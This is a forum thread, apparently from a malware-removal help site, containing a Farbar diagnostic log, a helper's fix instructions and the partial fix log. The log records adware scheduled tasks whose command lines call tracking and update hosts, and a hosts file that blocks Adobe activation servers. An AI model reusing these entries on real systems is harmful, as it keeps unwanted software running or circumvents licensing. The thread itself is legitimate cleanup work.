CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2601788436-2821952545-4294816460-1002_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\User\AppData\Roaming\Dropbox\bin\DropboxExt64.25.dll (Dropbox, Inc.)

==================== Restore Points  =========================

22-03-2015 00:07:30 Installed H&R Block California 2014.
30-03-2015 20:39:28 Scheduled Checkpoint
03-04-2015 21:58:40 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-17 03:53 - 2014-12-17 03:53 - 00001092 ___RA C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 ood.opsource.net ereg.wip4.adobe.com ereg.wip.adobe.com activate-sjc0.adobe.com cmdls.adobe.com activate.wip4.adobe.com 3dns-1.adobe.com activate.wip1.adobe.com 3dns.adobe.com
127.0.0.1 practivate.adobe.ntp activate.wip.adobe.com wip1.adobe.com 3dns-4.adobe.com activate.wip2.adobe.com practivate.adobe prod-rel-ffc-ccm.oobesaas.adobe.com 3dns-2.adobe.com www.wip4.adobe.com
127.0.0.1 3dns-3.adobe.com crl.verisign.net adobe-dns-4.adobe.com adobe-dns-1.adobe.com adobe-dns.adobe.com ereg.adobe.com ereg.wip1.adobe.com wip4.adobe.com ereg.wip3.adobe.com
127.0.0.1 hl2rcv.adobe.com wip3.adobe.com na2m-pr.licenses.adobe.com wip2.adobe.com adobeereg.com lmlicenses.wip4.adobe.com www.wip2.adobe.com ereg.wip2.adobe.com adobe-dns-2.adobe.com
127.0.0.1 www.wip.adobe.com activate.adobe.com activate.wip3.adobe.com www.adobeereg.com adobe-dns-3.adobe.com www.wip1.adobe.com practivate.adobe.com activate-sea.adobe.com wip.adobe.com
127.0.0.1 na1r.services.adobe.com practivate.adobe.newoa www.wip3.adobe.com practivate.adobe.ipp wwis-dubc1-vip60.adobe.com lm.licenses.adobe.com

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {00BF31EA-102A-4258-BA75-53DAC60B49A0} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-02] (Google Inc.)
Task: {01D47F59-E89E-4B5A-B74C-720501F61AE7} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-03-23] (Microsoft Corporation)
Task: {03470BE6-EE8C-4554-A1A2-0B08E526B04D} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {0B459F7E-DF2C-445B-ACA5-1D820F30FA36} - System32\Tasks\Dolby Selector => C:\Program Files (x86)\Dolby Home Theater v4\pcee4.exe [2012-08-31] (Dolby Laboratories Inc.)
Task: {0DA714EA-B915-4BEB-85EB-D189B08DCB06} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-11-02] (Google Inc.)
Task: {17A02B50-2ACC-4619-879F-CAD3CA0637E6} - System32\Tasks\oHBfPuiYh => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
Task: {27552F45-55D4-4889-895C-0D5FEB74FCA5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-06] (Adobe Systems Incorporated)
Task: {3370CFF3-8E17-44A9-BE5C-D6A9F69E3B95} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2015-03-10] (Microsoft Corporation)
Task: {A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} - System32\Tasks\miss_sunshine_notification_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exe
Task: {B492C228-9821-4206-9375-CB872E57B430} - System32\Tasks\miss_sunshine_updating_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe
Task: {B948AC6B-5535-404F-BA63-5F036F88339A} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-manhinlee@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-19] (Adobe Systems Incorporated)
Task: {C60E19B3-8E6D-4096-94ED-188021F935BD} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxcontent => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: {D2841400-614D-4AB5-958A-730058AE89CA} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: {DA291223-E838-48C8-A7A2-3A3A7DA4FA52} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe [2013-03-07] (Intel Corporation)
Task: {FE412556-000D-450E-A35C-94DBB763C949} - System32\Tasks\Microsoft\Windows\Setup\gwx\runappraiser => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-03-23] (Microsoft Corporation)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\miss_sunshine_notification_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exeé/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='miss sunshine' /appid='73143' /srcid='2913' /bic='8ba9e3ea18d9ab8d382924758032ff5d' /verifier='c70975eaec473c280c707979692583c8' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1428376683' /runfrom='task' /brwtype='notbg' /postponedhours='6'.GIG
Task: C:\WINDOWS\Tasks\miss_sunshine_updating_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe® /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=miss_sunshine_updating_service /funurl=http:/stats.buildomserv.com
Task: C:\WINDOWS\Tasks\oHBfPuiYh.job => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe

==================== Loaded Modules (whitelisted) ==============

2013-12-02 19:28 - 2015-03-13 12:41 - 00011920 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2013-12-02 19:30 - 2015-03-13 09:16 - 00118472 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00019456 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\ElevateService.exe
2013-12-05 00:47 - 2014-12-03 22:45 - 00076152 _____ () C:\WINDOWS\system32\PnkBstrA.exe
2013-11-16 01:08 - 2005-04-21 21:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00009728 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\OSD\IsMetroUI.dll
2014-01-06 05:02 - 2014-01-06 05:02 - 00409088 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\OSD\Skin\OSD_Skin.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00198144 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\GetDispDevs.dll
2014-01-06 05:01 - 2014-01-06 05:01 - 00094720 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\PCIeCtl.dll
2013-10-16 04:42 - 2015-06-29 03:07 - 03673600 _____ () C:\Program Files\GIGABYTE\SmartManagerV3\Skin\Main_Skin.dll
2014-12-31 11:11 - 2014-12-21 23:21 - 01572776 _____ () C:\Program Files (x86)\Innovative Solutions\Advanced Uninstaller PRO\checker.exe
2015-03-30 23:30 - 2015-03-27 20:45 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00750080 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2015-04-06 22:09 - 2015-04-06 22:09 - 00043008 _____ () c:\users\user\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpoqom_e.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00047616 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\libEGL.dll
2015-03-21 22:18 - 2015-03-04 15:08 - 00865280 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\plugins\platforms\qwindows.dll
2015-03-21 22:18 - 2015-03-04 15:07 - 00200704 _____ () C:\Users\User\AppData\Roaming\Dropbox\bin\plugins\imageformats\qjpeg.dll
2013-11-16 01:08 - 2009-02-27 17:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2013-12-02 19:28 - 2015-03-13 12:41 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2013-07-22 10:39 - 2013-05-31 13:30 - 01199576 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 01174856 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\libglesv2.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 00080200 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\libegl.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 09279304 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\pdf.dll
2015-04-05 21:18 - 2015-03-30 14:07 - 14974280 _____ () C:\Program Files (x86)\Google\Chrome\Application\41.0.2272.118\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\Users\User\Local Settings:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\SkyDrive:ms-properties
AlternateDataStreams: C:\Users\User\AppData\Local:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Application Data:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Temporary Internet Files:honRL14HPG0qKpaoTgpSHKJ

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2601788436-2821952545-4294816460-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\Antarctic\DesktopBackground\antarctic7.jpg
HKU\S-1-5-21-2601788436-2821952545-4294816460-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Local\Microsoft\Windows\Themes\Antarctic\DesktopBackground\antarctic7.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\StartupFolder: => "SolidWorks 2014 Fast Start.lnk"
HKLM\...\StartupApproved\StartupFolder: => "SolidWorks Background Downloader.lnk"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "SaiMfd"
HKLM\...\StartupApproved\Run: => "ProfilerU"
HKLM\...\StartupApproved\Run32: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "JunosPulse"

==================== Accounts: =============================

Administrator (S-1-5-21-2601788436-2821952545-4294816460-500 - Administrator - Disabled)
ASPNET (S-1-5-21-2601788436-2821952545-4294816460-1005 - Limited - Enabled)
Guest (S-1-5-21-2601788436-2821952545-4294816460-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2601788436-2821952545-4294816460-1007 - Limited - Enabled)
User (S-1-5-21-2601788436-2821952545-4294816460-1002 - Administrator - Enabled) => C:\Users\User

==================== Faulty Device Manager Devices =============

Name: Logitech_LGVirHid49713
Description: Logitech_LGVirHid49713
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Logitech_LGVirHid49714
Description: Logitech_LGVirHid49714
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Event log errors: =========================

Application errors:
==================
Error: (04/06/2015 10:12:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 36.0.4.5557 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1608

Start Time: 01d070f13029fd46

Termination Time: 46

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: b349b6e6-dce4-11e4-bf70-0c8bfd398315

Faulting package full name:

Faulting package-relative application ID:

Error: (04/06/2015 10:12:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: plugin-container.exe, version: 36.0.4.5557, time stamp: 0x550d0883
Faulting module name: mozalloc.dll, version: 36.0.4.5557, time stamp: 0x550cfa82
Exception code: 0x80000003
Fault offset: 0x00001e02
Faulting process id: 0x89c
Faulting application start time: 0xplugin-container.exe0
Faulting application path: plugin-container.exe1
Faulting module path: plugin-container.exe2
Report Id: plugin-container.exe3
Faulting package full name: plugin-container.exe4
Faulting package-relative application ID: plugin-container.exe5

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 2.2.F.0.6.1.4.0.3.E.E.3.C.F.1.C.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 2.2.F.0.6.1.4.0.3.E.E.3.C.F.1.C.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 4.6.A.3.0.E.B.F.A.7.F.2.7.9.4.1.C.2.7.0.0.0.D.3.9.0.0.0.1.0.6.2.ip6.arpa. PTR Gigabyte.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Unexpected conflict discarding   18 121.0.0.10.in-addr.arpa. PTR Gigabyte-2.local.

Error: (04/06/2015 10:09:14 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: mDNSCoreReceiveResponse: Received from 10.0.0.121:5353   16 121.0.0.10.in-addr.arpa. PTR Gigabyte.local.

System errors:
=============
Error: (04/06/2015 10:09:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LiveUpdate service failed to start due to the following error:
%%2

Error: (04/06/2015 10:08:26 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/06/2015 09:53:36 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The LiveUpdate service failed to start due to the following error:
%%2

Error: (04/06/2015 09:53:31 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.

Error: (04/06/2015 09:53:01 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (04/06/2015 09:49:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 18 time(s).

Error: (04/06/2015 09:49:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 17 time(s).

Error: (04/06/2015 09:49:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 16 time(s).

Error: (04/06/2015 09:49:02 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 15 time(s).

Error: (04/06/2015 09:47:14 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 14 time(s).

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2015-04-02 22:51:31.430
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.290
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.156
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:31.009
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.875
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.742
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.603
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.463
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.324
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2015-04-02 22:51:30.192
  Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

==================== Memory info ===========================

Processor: Intel® Core™ i7-4700HQ CPU @ 2.40GHz
Percentage of memory in use: 46%
Total physical RAM: 8106.47 MB
Available physical RAM: 4370.53 MB
Total Pagefile: 10090.47 MB
Available Pagefile: 5952.14 MB
Total Virtual: 131072 MB
Available Virtual: 131071.8 MB

==================== Drives ================================

Drive c: (WINDOWS) (Fixed) (Total:98.22 GB) (Free:25.08 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:931.39 GB) (Free:350.65 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 119.2 GB) (Disk ID: 1F18311A)

Partition: GPT Partition Type.

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== End Of Log ============================



#7 ah_hin (Topic Starter, Members, 61 posts)

Posted 09 April 2015 - 10:44 PM

Any update?

Thanks!



#8 B-boy/StyLe/ (Bleepin' Freestyler, Malware Response Team, 8,307 posts, Bulgaria)

Posted 10 April 2015 - 02:47 AM

Hi,

Please download the following file => and save it to the Desktop.
NOTE: It's important that both files, FRST and fixlist.txt, are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it in your reply.
 

Regards,
Georgi




#9 ah_hin (Topic Starter, Members, 61 posts)

Posted 11 April 2015 - 01:39 AM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 11-03-2015
Ran by User at 2015-04-10 23:36:24 Run:2
Running from C:\Users\User\Desktop\Malware software
Loaded Profiles: User &  (Available profiles: User)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js
C:\Program Files (x86)\Mozilla Firefox\my.cfg
HKLM-x32\...\Run: [] => [X]
BHO: Super Radio -> {11111111-1111-1111-1111-110611791177} -> No File
FF Extension: PDFConverterLight - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi [2014-11-30]
FF Extension: {80d2992f-5865-424f-bfbe-3e558ae15978} - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{80d2992f-5865-424f-bfbe-3e558ae15978}.xpi [2014-11-19]
CHR Extension: (miss sunshine) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\didlppefmhmoiaeemeffjchbieeghlan [2015-04-06]
S2 LiveUpdateSvc; C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe [X]
2015-04-06 21:18 - 2015-04-06 21:53 - 00000004 _____ () C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-04-06 20:18 - 2015-04-06 22:18 - 00001348 _____ () C:\WINDOWS\Tasks\miss_sunshine_notification_service.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00001004 _____ () C:\WINDOWS\Tasks\oHBfPuiYh.job
2015-04-06 20:18 - 2015-04-06 22:09 - 00000710 _____ () C:\WINDOWS\Tasks\miss_sunshine_updating_service.job
2015-04-06 20:18 - 2015-04-06 22:08 - 00000000 ____D () C:\Program Files (x86)\miss sunshine
2015-04-06 20:18 - 2015-04-06 20:18 - 00004344 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_notification_service
2015-04-06 20:18 - 2015-04-06 20:18 - 00004008 _____ () C:\WINDOWS\System32\Tasks\oHBfPuiYh
2015-04-06 20:18 - 2015-04-06 20:18 - 00003706 _____ () C:\WINDOWS\System32\Tasks\miss_sunshine_updating_service
2015-03-31 01:14 - 2015-03-31 01:14 - 00004387 _____ () C:\Users\User\AppData\Roaming\oHBfPuiYh
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\Super Radio
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\globalUpdate
2015-04-06 22:08 - 2014-12-31 11:13 - 00000000 ____D () C:\Program Files (x86)\0a1c1a41-5084-4b11-9f5e-84411f0df977
Task: {17A02B50-2ACC-4619-879F-CAD3CA0637E6} - System32\Tasks\oHBfPuiYh => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
Task: {A08AD4AB-C3CC-4AA3-A1DE-6E88C9036847} - System32\Tasks\miss_sunshine_notification_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exe
Task: {B492C228-9821-4206-9375-CB872E57B430} - System32\Tasks\miss_sunshine_updating_service => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe
Task: C:\WINDOWS\Tasks\miss_sunshine_notification_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_notification_service.exeé/url='http:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='miss sunshine' /appid='73143' /srcid='2913' /bic='8ba9e3ea18d9ab8d382924758032ff5d' /verifier='c70975eaec473c280c707979692583c8' /installerversion='1.50.3.10' /statsdomain='http:/stats.buildomserv.com/data.gif?' /errorsdomain='http:/stats.buildomserv.com/data.gif?' /monetizationdomain='http:/logs.buildomserv.com/monetization.gif?' /installationtime='1428376683' /runfrom='task' /brwtype='notbg' /postponedhours='6'.GIG
Task: C:\WINDOWS\Tasks\miss_sunshine_updating_service.job => C:\Program Files (x86)\miss sunshine\miss_sunshine_updating_service.exe® /campid=2913 /verid=1 /url=http:/cdn.buildomserv.com/txt/@CAMPID@/@VER@/file.txt /appid=73143 /taskname=miss_sunshine_updating_service /funurl=http:/stats.buildomserv.com
Task: C:\WINDOWS\Tasks\oHBfPuiYh.job => C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
C:\Users\User\AppData\Roaming\oHBfPuiYh.exe
AlternateDataStreams: C:\Users\User\Local Settings:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Application Data:uX64zwMvt2ofvbwnRqkfi0gFk3
AlternateDataStreams: C:\Users\User\AppData\Local\Temporary Internet Files:honRL14HPG0qKpaoTgpSHKJ
reboot:
end
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\Mozilla Firefox\browser\defaults\preferences\my-prefs.js => Moved successfully.
C:\Program Files (x86)\Mozilla Firefox\my.cfg => Moved successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611791177}" => Key deleted successfully.
"HKCR\CLSID\{11111111-1111-1111-1111-110611791177}" => Key deleted successfully.
C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\8qz11wfm.default\Extensions\{41819e5a-4017-4be3-b1be-0868b2283ac1}.xpi => Moved successfully.
